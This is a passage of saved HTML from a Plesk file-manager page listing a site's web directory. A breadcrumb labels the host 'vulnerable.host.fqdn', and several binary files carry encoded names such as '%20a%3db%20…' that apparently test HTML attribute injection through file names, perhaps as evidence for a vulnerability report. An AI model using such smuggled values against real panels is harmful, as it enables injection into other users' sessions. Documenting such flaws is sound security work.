           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" 
id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by 
size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = 
this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == 
el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" 
onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, 
&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 
